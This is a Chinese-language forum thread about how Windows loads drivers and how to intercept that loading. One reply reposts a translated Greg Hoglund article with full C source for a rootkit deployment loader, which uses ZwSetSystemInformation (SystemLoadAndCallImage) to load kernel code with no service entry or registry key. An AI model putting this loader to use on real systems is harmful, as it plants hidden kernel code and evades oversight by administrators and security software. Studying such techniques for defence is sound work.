阅读:1680回复:5
如何控制驱动的加载(通过设备名来决定是否要加载该驱动)?
各位大虾:
1、驱动加载的时候在内核中是怎么样的一个过程?也就是说如果通过CreateService、OpenService、CreateFile等函数来产生、打开一个服务(驱动),并通过设备名来控制服务(驱动)是怎么一个过程(操作系统是怎么处理的)?那位大虾能够详细说明一下?! 2、对于上面的过程中,我能过在那些地方加以控制?是否要写驱动,要写什么类型的驱动?在驱动中是否需要hook内核函数,需要hook哪些(native API)? |
|
最新喜欢:txqxc
|
沙发#
发布于:2004-03-02 11:45
郁闷!怎么没有高手解答!
是不是只要hook ZwLoadDriver就可以了? 可是我用softice 设了断点,但是一点反应度没有! |
|
|
板凳#
发布于:2004-03-02 15:20
Hook ZwLoadDriver是可以监测到driver的加载。但是,有的boot driver是和ntoskrnl.exe一起加载的,根本不通过ZwLoadDriver,比如scsiport.sys。
你用这个工具http://www.ybwork.com/ysniffer.htm看看就知道哪些driver是通过ZwLoadDriver加载的。 |
|
|
地板#
发布于:2004-03-02 15:59
大侠,我在2000和XP下bpx ZwLoadDriver了;然后用CreateService和OpenService、CreateFile来动态装载、打开一个驱动;可是没看见softice拦截住呀!会是什么原因了?
我用的是DS2.7。 |
|
|
地下室#
发布于:2004-03-02 21:13
用SystemLoadAndCallImage加载Rootkit
创建时间:2003-09-25 文章属性:原创 文章提交:Sephiroth_ (kinvis_at_hotmail.com) Sephiroth.V [前言] 我最近对NT Rootkit开始感兴趣,无奈国内的资料少得惊人,在这方面几 乎是一片空白,就只有翻译的Gary Hoglund的一篇《一个修改NT内核的真实的 ROOTKIT》。到国外的网站转了几天倒是收获非浅,国外在这方面的研究确实深刻多 了。现在我翻译另一篇Gary Hoglund的文章,在这篇文章里我加入了一些个人的注 释,如果大家对NT ROOTKIT感兴趣的话可以到www.rootkit.com上看看,那里有Gary Hoglund和很多人的优秀的NT ROOTKIT和大量有价值的资料。 [正文] 大家好。 这段时间以来在NETBUGTRAQ上有个有关在内核模式下如何保护系统免遭 ROOTKIT的讨论。这是个好现象,我们rootkit.com的目的就是让人们思考这个问题 。比方说,现在就有一个Pedestal Software的ANTI-ROOTKIT(全名Integrity Protection Driver)。 在今年的Blackhat Briefings上,很多聪明的人在谈论有多少种方法把代 码加载进内核模式-很明显是受到“ANTI-ROOTKIT”的影响。很多ROOTKIT的作者也 加入其中。所以我们打算改变这个WINDOWS ROOTKIT。 直到现在,这个WINDOWS ROOTKIT还是被设计为一个驱动程序。但是没有理 由一个ROOKIT必须被设计为一个驱动程序--或者一个可加载模块。 去年我们发布了ROOTKIT来证明完全用户模式的软件是基本没有意义的。想 想看,任何一个能够HACK你的系统的人都可以去加载进内核模式,这是100%保证的 。如果一个攻击者用一个用户级的帐户进入你的系统,他们然后就是获得 ADMINISTRATOR--以获得足够的权限使你能够加载内核模式代码。在这个事实面前, 很容易看到你的服务商的解决办法离开你的知识是十分脆弱的。 将完全的保护放到内核模式的主意挺不错,不过它不可能完成除非微软自 己解决。如果微软真这么做的话,那么安全公司就会消失:) 现在有人提出一种加载内核模式代码的方法,使用一个未公布的入口 (entry point)进入内核空间--比方象/dev/physicalmemory设备,或者一个使用“ SystemLoadAndCallImage”的系统调用(syscall)。我们继续研究,但事实是有一个 非操作系统支持的影响点(leverage point)来控制进入内核模式--因为这样,新的 入口点(entry point)总是被发现。 假定微软真的修补NT结构来保护以免于上面提到的这几种方法,也仍然有 通过在内核里寻找可供缓冲区溢出的方法。每个你安装的第三方驱动程序可以给予 你通过IOCTL()命令甚至是普通的读/写消息来进行缓冲区溢出的可能。甚至就是NT 里默认的驱动程序在这方面也很脆弱。 当ROOKIT被当做驱动程序处理时,我们使用服务控制管理器(SCM)来从内核 空间加载或移除这个驱动程序。这是一个默认标准,并且它需要这个ROOTKIT驱动程 序在注册表CurrentControlSet/Services下有键值。现在这种情况已经被改变了, 我们改进了这个ROOTKIT这样当它加载进内核空间时既不需要驱动程序也不需要注册 表键值。我们也不再使用SCM,取而代之的是它使用一个单独的中断调用--一个名为 ZwSetSystemInformation()的NT系统调用。使用这个调用我们可以立即加载这个 ROOTKIT并激活它。 -Greg Hoglund 源代码: //////////////////////////////////////// // New Deployment Module for rootkit 040 // ------------------------------------- // -Greg Hoglund http://www.rootkit.com //////////////////////////////////////// #include <windows.h> #include <stdio.h> typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; #ifdef MIDL_PASS [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer; #else // MIDL_PASS PWSTR Buffer; #endif // MIDL_PASS } UNICODE_STRING, *PUNICODE_STRING; typedef unsigned long NTSTATUS; //我认为这里应该是typedef long NTSTATUS, //否则一个unsigned的值总是不小于0,下面这个宏就会 //出问题 #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) NTSTATUS (__stdcall *ZwSetSystemInformation)( IN DWORD SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength ); /* //有关ZwSetSystemInformation的用法可以参考Gary Nebbett的《Windows NT/2000 //Native API //Reference》 //ZwSetSystemInformation设置影响操作系统的信息,定义如下: // NTSYSAPI // NTSTATUS // NTAPI // ZwSetSystemInformation( // IN SYSTEM_IMFORMATION_CALSS SystemInformationClass, // IN OUT PVOID SystemInformation, // IN ULONG SystemInformationLength); // //参数: // SystemInformationClass:将被设置的系统信息的类型,值为 SYSTEM_IMFORMATION_CALSS枚举的一个// 子集,SystemLoadAndCallImage就是 其中一个: // typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE{//Information Class 38 、 // UNICODE_STRING ModuleName; // }SYSTEM_LOAD_AND_CALL_IMAGE,*PSYSTEM_LOAD_AND_CALL_IMAGE; // // 成员: // Module:要加载模块的NATIVE NT格式的完整路径 // // 备注: // 这个信息类只能被设置,不是设置任何信息,而是执行把一个模块加载 到内核地址空间和调// 用其入口点的操作。期望入口点例程是一个带两个参 数的__stdcall例程(与设备驱动程序的 // DriverEntry例程一致)。如果入 口点例程返回一个失败代码,则卸载模块。 // // SystemInformation:指向含有被设置信息的一个调用者分配的缓冲区或变量 // SystemInformationLength:以字节为单位的SystemInformaiton的大小,根据给 定的// SystemInformationClass来设置它 // */ VOID (__stdcall *RtlInitUnicodeString)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString ); typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE { UNICODE_STRING ModuleName; } SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE; #define SystemLoadAndCallImage 38 void main(void) { /////////////////////////////////////////////////////////////// // Why mess with Drivers? /////////////////////////////////////////////////////////////// SYSTEM_LOAD_AND_CALL_IMAGE GregsImage; WCHAR daPath[] = L"\\??\\C:\\_root_.sys"; ////////////////////////////////////////////////////////////// // get DLL entry points ////////////////////////////////////////////////////////////// if( !(RtlInitUnicodeString = (void *) GetProcAddress( GetModuleHandle("ntdll.dll"), "RtlInitUnicodeString" )) ) //在ntdll.dll中获取 RtlInitUnicodeString地址 exit(1); if( !(ZwSetSystemInformation = (void *) GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation" )) ) //在ntdll.dll中获取 ZwSetSystemInformation地址 exit(1); RtlInitUnicodeString( &(GregsImage.ModuleName), daPath ); //建立设备 if( NT_SUCCESS( ZwSetSystemInformation( SystemLoadAndCallImage, &GregsImage, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) )) //加载进内核空间 { printf("Rootkit Loaded.\n"); } else { printf("Rootkit not loaded.\n"); } } |
|
|
5楼#
发布于:2004-09-15 09:11
注册表:当前控制集中的Service分支下保存专属于驱动程序的配置信息。这些配置信息包括驱动程序类型、启动类型。
当Windows启动时,Ntldr或Osloader读入SYSTEM注册表hive文件以加载引导驱动程序(启动类型为SERVICE_BOOT_START);之后,Ntoskrnl.exe引导系统启动设备驱动程序(启动类型为SERVICE_SYSTEM_START);之后,服务控制管理器(SCM)进程Services.exe加载所有自动启动(启动类型为SERVICE_AUTO_START)的服务程序和设备驱动程序。 StartService 指引服务控制管理器进程(Service.exe)执行ZwLoadDriver函数来完成加载服务和驱动程序。所以,只有调用到StartService才能被截住了。 |
|